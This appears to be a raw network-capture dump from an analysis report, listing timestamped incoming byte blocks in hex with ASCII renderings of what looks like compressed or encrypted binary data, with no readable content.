                                                                                                                                                            2022-09-29 12:45:15 UTC20229INData Raw: 61 98 2e 70 27 a7 a4 8a df 32 c8 fb d2 7d 9d 8c 75 79 91 8b 34 d8 8f 8e 51 58 63 75 91 f2 f3 c7 33 3d 15 93 1c ad 24 51 0d cb ea 21 14 0b 35 6d a7 88 d0 02 bb 06 7d 3f ed f1 3d 1d 3f fa f9 1e ed 32 f0 13 81 67 8f 57 b0 49 f1 66 0b 11 ee 30 9d 45 bc 74 8a cd 23 65 a8 1f 33 3a bc bc b5 97 c6 2b f3 34 5a ca 66 2f 55 f7 ad a8 9b 8f 27 7c 89 6b 93 5d c6 e2 97 eb f9 12 89 f8 ff ee 11 63 92 8a bf 51 58 72 b0 0c 22 eb 54 9d be 73 c5 5a 53 41 13 50 3b 14 9d 0a 6f 6d 56 be 3c 97 6e f7 0d ea 8d c4 93 7f 93 72 cc 2b d5 ea e5 fa 02 1d ce 90 f3 f8 4a 7d 59 15 6e a2 24 b1 a0 bc 7a c0 a8 b7 9d 0e d3 d7 02 8e 25 e1 88 86 a0 ab 05 0f 60 ad 70 e0 09 b4 d7 86 ae d3 58 16 a7 ea 63 67 2f 23 f3 27 a0 23 ff 18 7c 44 df 4e 13 d8 98 11 72 f2 05 ab ec f7 0a 4b e3 a0 52 fb 70 34 18
                                                                                                                                                            Data Ascii: a.p'2}uy4QXcu3=$Q!5m}?=?2gWIf0Et#e3:+4Zf/U'|k]cQXr"TsZSAP;omV<nr+J}Yn$z%`pXcg/#'#|DNrKRp4
                                                                                                                                                            2022-09-29 12:45:15 UTC20245INData Raw: cd 3f ca d1 88 12 48 77 95 85 1e ab d4 f2 17 9d 04 16 60 c7 5b 79 da 5b ae 06 57 b2 7f c2 7b a3 cf 29 11 81 64 79 3a cb 41 b9 95 ff 5f e2 8b 72 3b ea 8e d7 45 ba 0e e9 e9 d4 42 d6 a1 88 a9 9b 00 47 2c b6 ab 1c c1 d3 e6 cb 47 28 02 4c 32 87 44 f5 e9 6b f9 3e 52 aa 40 e2 b3 fe 85 d3 39 a5 dc c9 cf 57 f7 df 6a 0e 27 9f 9f d1 ad a5 35 08 75 1c fe 3a 05 b1 52 4c 71 c7 09 a8 ea ca 47 3c bf 6b 53 1c d8 6f c3 8f 5d fb 50 32 0d 7a ef 47 2a ef 1e ef 32 11 d0 f4 10 be 98 49 72 a5 6f de 96 d5 8d 92 44 b7 dd d9 e4 53 6d 54 07 82 6e c7 b4 9b de a2 f1 10 cb cf fa a6 8d d6 f9 72 ae c3 6f f8 7b 30 ea f2 eb b0 ab a6 01 59 0d ec d1 bc 39 6f d5 fd a7 00 3a 3e cb 3f 8d b8 1f 90 2f be e0 d7 65 b5 b7 e3 5f 94 7b b5 3f f8 27 b3 8f c6 62 52 a1 ca f7 24 e8 89 96 23 e6 8a 2f 8c 72
                                                                                                                                                            Data Ascii: ?Hw`[y[W{)dy:A_r;EBG,G(L2Dk>R@9Wj'5u:RLqG<kSo]P2zG*2IroDSmTnro{0Y9o:>?/e_{?'bR$#/r
                                                                                                                                                            2022-09-29 12:45:15 UTC20261INData Raw: c6 fb d4 2c 4b f5 3b 60 2f 94 a0 ad c8 23 5a 1a 34 84 b6 22 5b 3b 16 f3 1d 21 4c 07 3a e5 69 f5 fe 2c 9e 5f 43 34 d4 b8 3f 43 f2 2f 09 00 8f 2d f1 8d d8 bd a9 89 61 7d 30 27 1b 5e 56 46 3c f2 d2 13 4b 1b c0 42 81 14 d7 63 00 1c fc b2 1e 37 e5 bd 4f ba 0e 93 20 6d 09 32 81 83 6a 55 6d 72 54 2e 22 53 fb 83 aa 0f b5 dd 6a ef e8 14 bb 10 2c cb 2d 80 29 ea 8e 6d bf 4a 7a 62 c6 fc a5 24 ec 73 ae cb 6f dd 96 61 48 50 79 2f ea 63 03 84 1c 38 9f cc 55 34 35 1f 06 28 b9 98 8f 9c 09 cf 76 b9 80 54 5a b7 a2 aa 31 d8 cd 24 36 18 c4 d8 0b 00 3d 65 6f 6f 10 6b 73 29 6f 54 50 72 81 b2 b9 4c 44 4f 74 31 0b f7 b1 63 e5 d8 89 44 26 a0 64 bd 90 c1 1b 7b 4b 31 db 07 a5 fb b6 a8 f3 de 58 71 4b f8 48 18 f5 0d 9c fe e7 c0 65 3b 31 2d 35 92 fc 33 90 c0 04 99 a0 94 1d d5 16 12 4b
                                                                                                                                                            Data Ascii: ,K;`/#Z4"[;!L:i,_C4?C/-a}0'^VF<KBc7O m2jUmrT."Sj,-)mJzb$soaHPy/c8U45(vTZ1$6=eooks)oTPrLDOt1cD&d{K1XqKHe;1-53K
                                                                                                                                                            2022-09-29 12:45:15 UTC20277INData Raw: ac 0e 2d d1 dc 59 7b a7 04 38 e0 58 e8 0f 7e 01 9b c0 27 fe 0e 2b 6c 15 43 e8 2b 8c c2 6c a8 4d 73 f1 d7 28 c5 5e c6 b4 97 fb d5 ae 04 ac 22 03 81 46 fa a8 bf 1b bc e1 f3 37 48 e9 6c 4b 0a 35 f8 76 e9 d4 dc 60 b4 e4 f7 5b 37 90 dc 25 81 ca 85 a7 44 54 47 d0 fb 77 fc c4 23 19 b0 de 38 9c af e8 65 7c 1b d8 ce 5c 70 2d 29 b0 8a 25 e6 20 7c 9b cf b1 b5 99 b1 71 d1 62 e7 8f 84 62 9a a6 71 6d 73 34 0c f9 7f c7 56 6b 76 78 94 64 fa 8b 0f 79 7c 4c 5a 86 95 c6 4f 4b 0f ae 6f a9 6b 44 27 26 ff f5 98 91 bc ab 4a d8 96 88 00 0d 15 28 01 27 92 d0 22 fc 28 c1 3b 2a d6 d0 57 f9 a0 45 52 92 1f 7f 8d 5e d7 04 26 4a 1a 65 c8 11 f2 cb c0 7e 4f e9 e7 ba e8 28 31 e5 9e 38 9f dd e8 6b 4d aa 8e 25 77 55 0f ba e1 48 28 94 ec 11 a5 a0 18 d5 3c 31 08 47 7a 90 ed ee 66 9a ff ee ff
                                                                                                                                                            Data Ascii: -Y{8X~'+lC+lMs(^"F7HlK5v`[7%DTGw#8e|\p-)% |qbbqms4Vkvxdy|LZOKokD'&J('"(;*WER^&Je~O(18kM%wUH(<1Gzf
                                                                                                                                                            2022-09-29 12:45:15 UTC20293INData Raw: 2a 22 76 56 42 da 0f 68 0c bc f4 e8 a2 89 7f 09 49 16 07 ae dc a0 4f a7 3a d9 4f 28 1c 75 26 7b eb b9 09 4b 9d 93 4d 7a 28 0a 32 e6 85 91 53 5d 7d 7c 30 26 0f da fc 46 c0 50 af 78 ec 45 a0 e6 f1 85 f7 d2 c8 01 ba 64 a9 5a 07 f6 ae a1 5a fb 21 e0 da a9 0e f8 42 7b 8e 3f f0 70 ea a7 ee 01 87 b6 e3 b5 3b 38 3d 42 9a 6b 9a 2a 70 c6 fc 5b 66 26 0b cf f9 25 ec 5e e3 47 b5 ad d2 97 6a 63 4f df fd fc f2 47 16 04 e6 e0 c7 96 7a 2c b0 ef d0 06 ad 3e e1 39 8f aa 56 99 cf 72 09 12 24 83 e2 84 4f 07 13 dc 11 b6 6f 2e 4f b0 d8 35 65 d9 e1 5f f3 98 38 81 01 25 23 17 69 46 80 0d ec a1 9d 33 d3 cf 2b 56 31 88 4a 6c 85 dd 65 03 82 4b 26 7f 39 71 ea b0 a7 c4 8c b3 09 43 3d 79 75 a9 62 25 f2 cd fe 60 c6 83 a5 98 58 81 78 c7 45 02 72 c2 a3 16 b3 b3 f4 cc 20 a1 ba c5 93 e3 64
                                                                                                                                                            Data Ascii: *"vVBhIO:O(u&{KMz(2S]}|0&FPxEdZZ!B{?p;8=Bk*p[f&%^GjcOGz,>9Vr$Oo.O5e_8%#iF3+V1JleK&9qC=yub%`XxEr d
                                                                                                                                                            2022-09-29 12:45:15 UTC20309INData Raw: 1d af a4 77 1e df 25 50 e7 20 f1 65 a4 19 5e e8 5f 26 08 85 c1 fe d2 32 94 aa a2 f3 18 ff 0f c6 88 3f 62 5d 3e 75 6c d0 63 9a bf dd 77 fd cc 7f e3 3e bf 4f 91 df 53 54 5d 9a bd 8a 92 ab 26 28 e5 84 94 1e e7 b5 fe 44 0a 70 58 8c 9e 9e db 05 7d b5 e4 cd 07 9e 66 f8 37 5e d6 df bf db 91 15 c4 e6 0b fe 92 2e 57 1d 7d ce c4 a6 ba e0 94 32 a5 57 a2 d7 04 08 8c de 96 3e b4 43 2a 61 94 36 dc 23 92 d4 20 34 53 3a ae 8e 49 c6 a5 f5 65 11 07 6f 45 8d b2 4b 35 f3 b3 0a 6e 33 27 86 c9 e3 96 ad ce f7 c5 83 26 6a 32 c8 0a e9 56 3c e2 d0 1c aa 06 0e 07 ec 3b 0c 36 da 51 b1 b8 d9 79 57 9f 58 da df e9 6a 02 22 c1 9a fe 30 86 ad cb 2f b0 fc 2f 04 85 22 e9 f0 ab f1 19 4a e0 9d ac 3c 37 f1 d5 e5 f5 17 25 53 7c 96 88 c4 48 60 d5 c7 d2 9f e1 9d f0 5f 1d 7f ef 70 88 f2 9b f0 6d
                                                                                                                                                            Data Ascii: w%P e^_&2?b]>ulcw>OST]&(DpX}f7^.W}2W>C*a6# 4S:IeoEK5n3'&j2V<;6QyWXj"0//"J<7%S|H`_pm
                                                                                                                                                            2022-09-29 12:45:15 UTC20325INData Raw: a2 4d e1 18 f7 c5 4a 16 85 01 bc e2 e7 58 88 84 4e 3b 29 12 cc 25 ab f7 f2 73 c1 ab bd c0 af 16 47 51 16 28 70 be b5 71 f0 63 2e 15 e1 c6 10 da 9d 20 22 c2 3e 05 1e be 71 85 c5 d7 a5 1d f1 75 f5 5c 89 fc cf 9f 77 c2 7f 18 36 1e 24 83 10 5e 07 8b 3f 92 2c 98 a6 4d 11 23 ed 9c 50 72 45 cf 35 66 24 40 d3 9c eb b2 06 ca f8 fb 16 7e 4e 31 42 c0 08 17 5e f5 2e 08 12 b9 a0 6b e1 62 4a 6b fe ce 74 b2 41 0c a3 63 10 26 ed 94 89 5a 19 d3 a9 73 5b 94 01 df 57 40 d7 ab 36 40 a7 1b 71 49 77 21 1c 3b 05 0f 53 ef 4e 06 f7 f4 92 95 29 53 46 92 e7 57 70 d1 fb 12 8f 50 fd 12 50 24 26 c0 db 53 b1 b6 d4 e9 3f dd e4 61 e9 7f 15 8e 87 c8 b6 85 c4 85 27 10 fa 30 33 06 1f 80 82 f7 81 50 1d e6 86 d0 cc 04 f1 f8 a1 e7 f0 fc 65 69 08 c2 c2 39 8c 44 c1 2c a0 e5 e9 af f1 17 4e 8d 1e
                                                                                                                                                            Data Ascii: MJXN;)%sGQ(pqc. ">qu\w6$^?,M#PrE5f$@~N1B^.kbJktAc&Zs[W@6@qIw!;SN)SFWpPP$&S?a'03Pei9D,N
                                                                                                                                                            2022-09-29 12:45:15 UTC20341INData Raw: 46 2d 4f 29 55 37 c2 90 00 41 2c 31 e5 63 fd 5a 08 0b ea 60 66 bd c5 d8 81 e3 53 d3 9f 85 a0 61 6b 38 33 6f 1e 61 fc c9 60 47 f2 ea fa dc 92 58 d0 ab 1c 02 64 ab aa 2f 18 16 fe a1 89 24 75 d6 2c cf 03 11 13 13 2e 01 c8 0a 22 e2 79 2b d2 d7 76 f4 22 72 dd 27 eb 70 e9 43 59 69 8a 51 11 ea 15 96 f7 6e 94 47 e6 9f a1 59 bc fd 95 8e 0d 8c a1 c7 95 60 5f 8a 8e e9 17 b7 a2 30 74 15 f5 2f 07 e1 95 a5 d2 bd 63 35 2a cf 46 46 72 65 a5 c2 2c 40 a8 90 42 0f 60 97 ed c7 09 b1 17 0a 7d b7 a9 1a 27 7b 26 b6 a6 85 df 1f 43 27 c6 9e 7e 51 2e c8 e5 2f 1b d3 fb a5 cd 99 15 19 27 45 4e 4f 98 91 3d 0c 89 05 ce 0e f1 e2 ae aa 0b b3 63 ce fa e1 40 c5 08 08 91 4f 5a 75 1d 55 e9 ce b0 11 37 29 a5 1b ee 50 95 d7 13 72 3c 30 ca 8a 61 94 52 0b 6c 71 7e 6b ee e7 3f aa e1 2e 6f cc 58
                                                                                                                                                            Data Ascii: F-O)U7A,1cZ`fSak83oa`GXd/$u,."y+v"r'pCYiQnGY`_0t/c5*FFre,@B`}'{&C'~Q./'ENO=c@OZuU7)Pr<0aRlq~k?.oX
                                                                                                                                                            2022-09-29 12:45:15 UTC20357INData Raw: 79 01 e9 43 cf 45 1b 5c 90 8d 59 c7 e9 96 24 f7 53 60 ed ce 0f 3c 90 b6 1c af 85 f2 98 7a a9 69 69 fa dc 4b a7 ff 74 8b 25 e0 2c c7 72 61 44 1f 60 33 de da 03 9d 6e 45 95 8b 66 6e 59 10 43 6d b0 63 f7 11 12 20 63 42 76 c0 de 49 96 94 1d c4 dd 50 f2 59 9a ed 66 f6 67 27 c7 73 37 a4 68 14 aa 93 34 bd d1 3a d0 84 33 40 a1 f5 5b 23 47 d4 cb 27 d2 42 28 f5 2b d4 07 66 be a4 ad c2 1f e1 a3 68 ec 0b 3a 03 24 aa bf 1e 81 ac f7 7d de da 69 9c f3 e7 6e 25 55 d2 85 81 8d 8c ff 05 64 ea 80 62 d3 0a e5 e8 67 c2 af 10 d4 b2 c5 06 cf b0 10 5b 56 f1 ca 1c 3d bb 37 b4 2e 4e b8 bb b7 af 5d 69 b3 33 ca da 34 39 df 36 ad 4e 9c 85 ac 42 8e e0 cd 3c f9 14 70 1f a8 4a 0e 3e f0 ab 86 dc 08 27 44 34 14 73 bc b8 f4 f2 2e 39 ea a3 02 a8 43 94 1a 30 10 a7 21 52 a9 a5 50 0e fe 31 d7
                                                                                                                                                            Data Ascii: yCE\Y$S`<ziiKt%,raD`3nEfnYCmc cBvIPYfg's7h4:3@[#G'B(+fh:$}in%Udbg[V=7.N]i3496NB<pJ>'D4s.9C0!RP1
                                                                                                                                                            2022-09-29 12:45:15 UTC20373INData Raw: e3 f5 89 af 38 43 42 da e8 5c 99 98 b5 74 e0 6a e7 4a 40 9d 28 a4 39 e0 ab ac 5a ac c3 83 b7 4f 50 12 74 72 92 dd 7f 25 c5 47 48 01 cf 46 6e 31 f9 92 d8 91 97 b2 d7 0e cb 94 9b 8d c0 00 f5 86 b3 4a b3 e2 e2 e4 63 c0 19 a5 78 fa 4d 96 8a eb 7c d8 18 1f 56 7e fe e2 6a a6 72 3f e9 9e 50 17 52 86 f8 be e9 ee bc 0e 4f c3 b6 b5 83 03 cc 9c 5b ff 7e 17 9d b9 d2 73 50 4d c3 87 e1 75 a0 de 26 e2 f0 44 9a 93 7c e4 1e f5 5e 6a ba b3 a6 d9 29 e6 a4 09 4f de 3a ad c0 27 f7 b6 74 6b d7 eb 0b 6b bb 4a 46 01 ad d6 02 c9 f5 49 72 06 81 0b 6a 75 85 7d 9a 72 7e 5c a5 6f 67 3b 31 e1 b1 0e 8a 20 83 94 dd 08 ef 81 76 51 89 d0 8a ba ac 32 43 35 3a 53 52 e6 fd 00 19 48 ae 02 1d e8 0a 6e 83 46 3d 07 44 e8 fd 5d bf a8 e3 b7 74 f0 61 0e 67 87 ec 29 22 7e 4a 7f d6 de 52 af 61 d8 da
                                                                                                                                                            Data Ascii: 8CB\tjJ@(9ZOPtr%GHFn1JcxM|V~jr?PRO[~sPMu&D|^j)O:'tkkJFIrju}r~\og;1 vQ2C5:SRHnF=D]tag)"~JRa
                                                                                                                                                            2022-09-29 12:45:15 UTC20389INData Raw: be bd 76 5f f5 1c 37 b6 fc 7a d0 2f ce 50 9a ff cf 56 8f 14 54 2f e6 fa 76 74 f0 63 b2 8f 42 9a 78 76 da 40 33 69 ed 02 b2 bb 32 c5 0f 1b a9 1b 12 16 35 24 14 01 c8 8d d5 4e 81 89 be 1f f0 ed fa 2d 04 8d 1a f0 19 2d dc b6 cc 9a 1e 82 d0 70 0b e9 ed 72 4d 23 c1 6a 00 bb 96 5c 3a a2 11 4d 28 ae 47 50 85 dc 67 20 8b 3f 2c 58 50 b5 af 76 4d 92 ba 04 32 4d 47 9a 84 51 a7 74 f3 1a 43 a0 15 ec 0f b4 30 e8 e8 00 de b7 41 ea 37 67 19 6d c4 6b 5d 4d c1 f6 a1 df cd 78 6b a8 ff 12 de c4 00 71 27 ce c8 23 18 fe ca cb 34 38 76 91 7f 87 e4 ac c3 04 03 92 5f 51 32 91 ed 57 95 4e 6c 45 81 4e d9 7f d5 1f 9a ab 23 ff 9b 2b 36 fb e2 6b 5d ca f4 40 12 c7 9d 66 66 99 b2 41 a3 be da 5b 1b 33 26 7c 2d 5b a1 28 d3 e7 81 0f a5 9c 50 b4 ab 1e 8f b7 a5 30 5f b0 39 a7 9b 72 07 46 d5
                                                                                                                                                            Data Ascii: v_7z/PVT/vtcBxv@3i25$N--prM#j\:M(GPg ?,XPvM2MGQtC0A7gmk]Mxkq'#48v_Q2WNlEN#+6k]@ffA[3&|-[(P0_9rF
                                                                                                                                                            2022-09-29 12:45:15 UTC20405INData Raw: 4e 98 76 5e bd 43 5d 4c 44 33 e9 c0 59 69 02 b6 ad 18 87 1b fa 25 33 a5 55 b3 36 e4 f6 aa f1 31 2e 5e 5d 7b e9 16 f0 06 2b cc e1 f9 42 89 ec f3 e8 62 ee 99 17 2d 6b 26 af c3 1b d7 5f 7d f0 f0 ee ee cb b2 3f 94 0b 17 3f c6 b1 7c 20 2b 54 db 06 12 8a 2f 60 e5 30 33 31 8e 38 9d 65 5a 08 99 9f e4 d8 50 7e 2a 70 a4 72 9c 03 f5 b9 57 dc d6 c6 c0 e0 fc 0d e4 91 9e b2 55 7a 92 8f 2d 03 ad c4 45 7a 1d b9 3e fe d7 e8 44 81 f7 b4 4e 30 a6 e1 6c 1b 94 23 3c f0 7c 1a 1b a1 ff 25 1b 55 0d 23 3f d8 2c 59 3e 20 45 eb 6b 22 e3 ea 87 d2 d8 4d 71 67 33 ff 6a e2 24 21 ef fc dc b0 30 57 9a f9 f6 45 e6 7f 40 af 7f 0c 48 8b d8 34 1e 44 b7 3d 01 90 34 f2 60 f7 ac f4 44 29 ae 0f 5b f6 9c 4b 2c 99 c5 30 28 4f 16 2c 2a 72 00 ed f7 c7 52 8c 2e 78 27 0d 56 04 ff ab 9a 22 4d 19 05 58
                                                                                                                                                            Data Ascii: Nv^C]LD3Yi%3U61.^]{+Bb-k&_}??| +T/`0318eZP~*prWUz-Ez>DN0l#<|%U#?,Y> Ek"Mqg3j$!0WE@H4D=4`D)[K,0(O,*rR.x'V"MX
                                                                                                                                                            2022-09-29 12:45:15 UTC20421INData Raw: 30 85 f9 aa 60 09 ed c0 6c 4a cf e0 54 24 36 55 c9 51 6c af 54 a7 f0 e8 13 e2 4d 0e 67 3d 88 11 7f 69 15 fb 03 57 36 5a 27 c6 f2 50 cc 3f be 51 a7 35 6d f4 e5 89 0d 5e ee 9c 91 f0 0a fe 58 58 ea 39 1b d7 b3 31 93 a4 bd e7 8d f1 e3 3f aa 9d 28 48 a4 af 1a a2 7d 54 57 57 fe a3 5e 50 88 32 b3 07 8e 29 d3 6b 38 09 36 bc d6 7d 5c ed c1 05 dc 56 bf c2 ea 45 00 21 73 47 84 8b 9e 89 3d 82 6b c2 78 5a e9 7c dd dd ae b6 f2 00 1f e2 fa 05 eb af 57 7e 0c 55 4a 02 9a ef 63 90 a2 df 38 6a e4 40 bf 0e 71 27 60 a6 db 05 b6 4a 19 fe 7d fb 10 1b 04 62 14 8f 92 07 fd 41 d5 f1 64 ed e2 77 0b 11 02 94 5a a1 d0 ae eb f0 14 7d 02 21 f3 a8 7d 6d 5b 64 79 2b 32 26 0b 61 c7 84 bf cd 94 5b e3 96 95 55 74 b5 79 8e f2 29 e1 19 28 4e 31 bd 7f 30 15 10 39 67 53 9f af 4a 96 9e f1 85 c1
                                                                                                                                                            Data Ascii: 0`lJT$6UQlTMg=iW6Z'P?Q5m^XX91?(H}TWW^P2)k86}\VE!sG=kxZ|W~UJc8j@q'`J}bAdwZ}!}m[dy+2&a[Uty)(N109gSJ
                                                                                                                                                            2022-09-29 12:45:15 UTC20437INData Raw: d1 3b 3d 11 43 b8 69 15 80 83 c6 74 5b a7 82 7c eb b8 12 9b 15 6b c9 7f e2 3e dd 32 46 85 db 37 d1 ad 62 6d a2 1c cf 35 bb 14 3f a4 83 c8 c3 73 ae 94 81 52 8d 2f c4 e5 17 30 44 45 06 2a f0 07 57 e6 05 26 0e 47 71 fe 8a 29 83 8c 72 66 df 53 36 d9 b5 c9 ac 79 2d c2 cd 36 d8 75 ec ad 98 90 21 d4 a0 62 43 e7 ce 07 8e 68 72 82 85 e0 d8 0b f9 51 52 e5 0c 15 7a d9 90 b4 5c 32 6c 8c cf ef f1 ad 0f 1b ef b5 c0 97 04 0c 5f 1f 4f 0a e3 fb 6b 0c 88 2e 94 98 67 f4 f1 b4 a6 cd 8c e5 8c 8d 9d 3a 0e f3 bc 6f c3 ed c1 31 79 b8 6a 1d ed 94 c1 93 c6 c2 ba 43 a4 e6 62 61 d2 0a b8 bb 47 e2 ef 0b 7c b5 e9 07 f3 81 83 38 79 e6 da c2 c6 e5 02 92 23 c5 6c b9 33 97 f5 6d e2 f9 ba 68 17 10 a0 a0 32 43 c0 26 6f a3 c2 7b 08 73 a1 ca ab d3 5a 3b 6b 69 6c 0a 79 33 ae df 74 cd ab 56 54
                                                                                                                                                            Data Ascii: ;=Cit[|k>2F7bm5?sR/0DE*W&Gq)rfS6y-6u!bChrQRz\2l_Ok.g:o1yjCbaG|8y#l3mh2C&o{sZ;kily3tVT
                                                                                                                                                            2022-09-29 12:45:15 UTC20453INData Raw: a9 28 e5 c0 e1 13 10 de 82 92 a4 74 5a a1 cd d4 74 99 9e 55 26 a6 98 b6 12 f2 76 09 d6 01 a8 95 ee 93 6f 49 09 ce 67 6a 19 80 eb bc 7f 6d 10 29 f5 ed 8b 64 6b 93 f7 d4 2f ab e9 08 27 cf 86 66 dc 75 c0 a9 73 d4 31 a9 f4 8b 37 34 0f 2a 62 92 85 48 ab dd 14 ad 0b 8c 91 48 1a 58 42 e8 4a db 2e 1f 67 24 ff ec 99 0b 83 fe e3 6a bc e6 ef 2e a6 8f 6d be df 84 ec c1 b2 ce 1a 27 d4 9c 82 74 05 92 a3 c7 94 b0 19 bc f5 e0 42 24 05 cb ec fd e4 73 94 23 f2 a9 06 10 3f 98 28 53 0b bb 36 e8 68 1b 98 d6 23 0b 85 05 26 5f 42 48 3f c3 5f 4e 12 84 47 9c c7 0b e5 46 75 8d 63 16 36 9c 2a eb f6 e3 90 52 ef 15 32 ff 68 91 f4 63 76 8a 8d 6a b7 5d a5 fa f1 25 b4 05 12 53 84 5c 9e 17 36 fd ca de 41 d4 d0 cc 19 51 6c a5 a4 6f f4 22 aa 8e b4 6a f1 28 b3 8c 35 15 cf 77 d4 72 6c 67 49
                                                                                                                                                            Data Ascii: (tZtU&voIgjm)dk/'fus174*bHHXBJ.g$j.m'tB$s#?(S6h#&_BH?_NGFuc6*R2hcvj]%S\6AQlo"j(5wrlgI
                                                                                                                                                            2022-09-29 12:45:15 UTC20469INData Raw: 1b f7 5c f3 d3 a4 26 cb 04 cd 0f 9c c0 64 58 e3 5a 05 08 ff 7b fc e0 d1 cc cb 72 32 90 5e f4 72 8c fe 43 d6 f3 f1 9d e9 1b fa fd 1b 9b 62 42 5e f8 b4 09 72 f3 fd 2e e0 0d d8 1e d6 41 e9 6f 9a 53 48 8f 9e e8 28 b9 32 df fc f5 64 97 58 72 6d a9 db 8c 6b dc 24 81 b3 9b ac d6 96 ce a9 0c b2 3a e7 e9 1e f9 a2 9c 6e 57 9a bd d0 43 0d 9a 59 d7 5d fc b7 40 4c ab ba 06 74 8c 64 3b 30 25 5e 73 3c 1f 91 72 5a c1 29 4e ed 68 34 4c 9c 4d f7 df 9c 54 77 cb 9e 35 52 f5 1a 44 dc 30 00 ac 99 32 6c 24 a8 b7 3e 2e 57 f0 1f 85 c7 80 06 86 7c 85 e6 87 a8 46 60 4d 63 33 6d 09 f1 2f c0 24 ea 92 ba f4 ca 75 8d 5b d7 8c 43 31 86 59 af 72 38 23 a2 52 de c1 5a f5 5e 7c 6e 2f 24 7b 15 6d da 18 08 77 7b 01 74 c1 02 18 86 9c 7b 2d a2 10 2c d1 db 62 39 21 e6 23 65 24 68 44 bc d4 d2 4c
                                                                                                                                                            Data Ascii: \&dXZ{r2^rCbB^r.AoSH(2dXrmk$:nWCY]@Ltd;0%^s<rZ)Nh4LMTw5RD02l$>.W|F`Mc3m/$u[C1Yr8#RZ^|n/${mw{t{-,b9!#e$hDL
                                                                                                                                                            2022-09-29 12:45:15 UTC20485INData Raw: a5 b4 0a d5 6b fb d6 83 85 8b bb a1 5c c1 60 79 75 7f ac c2 fd 5a 6f bc 03 15 58 54 ca 06 3e 98 07 84 d0 98 90 0b e5 c8 67 da e9 82 7c 42 f3 b5 cd 02 6c 96 98 f7 0b bd fe d0 e7 f6 2e fe fb 2d 06 69 96 7a 69 6f 82 fe 6b 86 7e 82 b4 ce da 04 5e 26 ce a1 a7 c7 e5 a2 6d 5f b9 fb 6c a8 97 32 da d6 b0 f4 28 37 35 37 bd 72 9f f5 dd 63 88 1e f9 15 b3 9c 17 58 ae 15 82 37 82 4c 21 fe 70 22 35 4d 59 fc 7f 36 19 40 22 9c bd f9 21 e7 9c 39 d9 b4 fb 04 f4 fe 91 5e c6 86 f8 41 88 e0 f7 08 09 2d fb d1 ab 08 e8 05 86 69 22 41 f0 0d c2 56 06 32 44 a2 ac ed 1f 95 aa 59 92 c1 f2 32 30 16 a7 63 22 ce 9f a5 20 99 9a 4b fd aa d6 f7 49 90 49 2f 8d a9 d0 f2 93 50 2c 94 c4 5d a4 29 e8 03 fb cd 53 34 f4 cb 6f cc 3e b9 49 19 a9 a4 63 2d 0e f4 6c 65 7f 8d fc 13 31 34 fa 8d bf de 28
                                                                                                                                                            Data Ascii: k\`yuZoXT>g|Bl.-iziok~^&m_l2(757rcX7L!p"5MY6@"!9^A-i"AV2DY20c" KII/P,])S4o>Ic-le14(
                                                                                                                                                            2022-09-29 12:45:15 UTC20501INData Raw: dc fa da 56 fd af c7 82 f4 a7 95 82 b5 c8 a8 cc dc f2 1d 95 63 21 aa 31 04 25 14 c1 e9 1e 8a f6 da a3 6d d3 39 05 74 bb 40 5b 7e b1 c4 a3 34 bd 6a 69 ee d6 dd 0c 2e be 4a b5 1a 20 bd 42 f3 a1 ba 98 e5 8c 43 f9 d3 cf 53 c0 7f 3e b1 10 6d 08 0c c0 15 2e 44 d9 55 ea e8 cd 74 ba ab e5 be 8d 79 af c6 dd 8f 07 e8 af bd b5 a1 a4 bb 79 d3 f7 3d b9 5a df cb 4a 2d 9a 5c e4 3b 75 7f 83 07 9c d4 49 ca d4 45 b1 97 e6 26 41 3b 6f 36 6d b1 ee bb 01 01 00 65 0e a8 5e be 5a ed d7 0c b1 20 19 c4 6b 9b 60 c4 f3 f0 64 a8 8a 47 57 d0 9e ec 33 bb 5f 85 41 16 6b 54 37 1f 2f 86 a8 c2 8e 8e 51 76 c3 53 3d e1 19 62 0f 6c 50 e5 05 98 03 85 bd 80 da 80 ac 72 ee b4 dd 67 a1 1c 63 72 ff fd e7 6b 35 51 17 89 e2 c2 e9 5f 3a 11 79 e9 d2 4c 17 30 6f 8e 3b f0 32 48 8c 08 6c 31 a4 58 e4 5f
                                                                                                                                                            Data Ascii: Vc!1%m9t@[~4ji.J BCS>m.DUtyy=ZJ-\;uIE&A;o6me^Z k`dGW3_AkT7/QvS=blPrgcrk5Q_:yL0o;2Hl1X_
                                                                                                                                                            2022-09-29 12:45:15 UTC20517INData Raw: 85 4d 52 ea ed 1a d3 47 e2 e9 77 4d 53 f9 da 46 e8 c4 ba 73 73 cc 75 22 52 33 51 7f 24 37 e4 d5 1b fa 08 c8 d1 b7 84 0f 26 70 fa 5e b9 8b 6d c0 44 2e 0f eb 83 3b 5d bd f1 19 c9 8a 5e 7a f4 f7 bc 99 d4 6d d8 3c b5 b3 ec ac 48 79 85 23 75 9b ec d8 68 d6 04 0b ea 51 1c 02 39 96 eb 93 b5 79 06 59 69 7b 1b 58 4b dd 1b 72 96 d2 c7 f0 2e a1 39 fb dc 34 63 2d f9 5d 88 f4 de 7f 1a 64 53 9f 16 14 44 43 d0 3f d0 10 d5 ab 3a 94 29 a2 8e 5f 5b a1 a6 87 3c b5 57 81 01 12 34 f5 0e 8c d5 50 c7 da 79 40 34 91 fc 32 d0 32 c0 7a f5 b4 89 30 4e e5 7a f5 50 45 ae e1 56 b0 f9 70 2e 4a 15 a7 24 a2 b2 17 dc 60 58 0a d4 0b 13 19 1d b9 66 0e 59 c0 fa 03 a3 c5 6c 5a 07 5d 31 5a 60 bd 64 ab 59 73 b5 bd cf 35 ba dc b4 58 06 6e 5b 40 48 48 1a 71 ad 47 df ca 55 ea 30 d3 f8 2b 88 83 a8
                                                                                                                                                            Data Ascii: MRGwMSFssu"R3Q$7&p^mD.;]^zm<Hy#uhQ9yYi{XKr.94c-]dSDC?:)_[<W4Py@422z0NzPEVp.J$`XfYlZ]1Z`dYs5Xn[@HHqGU0+
